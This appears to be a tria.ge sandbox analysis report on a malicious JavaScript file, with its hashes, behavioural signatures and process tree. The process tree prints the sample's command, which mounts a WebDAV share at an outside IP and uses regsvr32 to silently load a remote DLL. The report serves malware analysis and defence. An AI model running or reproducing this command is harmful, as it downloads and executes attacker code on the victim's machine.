Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 02:14
Static task
static1
Behavioral task
behavioral1
Sample
459218370446121433.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
459218370446121433.js
Resource
win10v2004-20240709-en
General
-
Target
459218370446121433.js
-
Size
5KB
-
MD5
d8c4529a4f1db13819e670d2a913c7bd
-
SHA1
300a1948006261f19afa6547cb89f2170f6d5296
-
SHA256
83a34d7d1ddce6af24d568f85bd113fbe88708b81f402d5821eaf100120e3e1d
-
SHA512
ba7cc27c796347e8ca866386355594552a434b7a81c5e4d9c7aabbc52a97e7f7465ae69345189476cb280c1954cff13f894ab200a0504992d85fe626244e2d32
-
SSDEEP
96:u5BwDXfVyX94cVNs7aqlAq4JnAkzKaH4Jng:uHw7VyX94WNs7tlAq4nAkzKaH4ng
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2876 wrote to memory of 3668 2876 wscript.exe 85 PID 2876 wrote to memory of 3668 2876 wscript.exe 85 PID 3668 wrote to memory of 3584 3668 cmd.exe 87 PID 3668 wrote to memory of 3584 3668 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\459218370446121433.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\31400226922294.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3584
-
-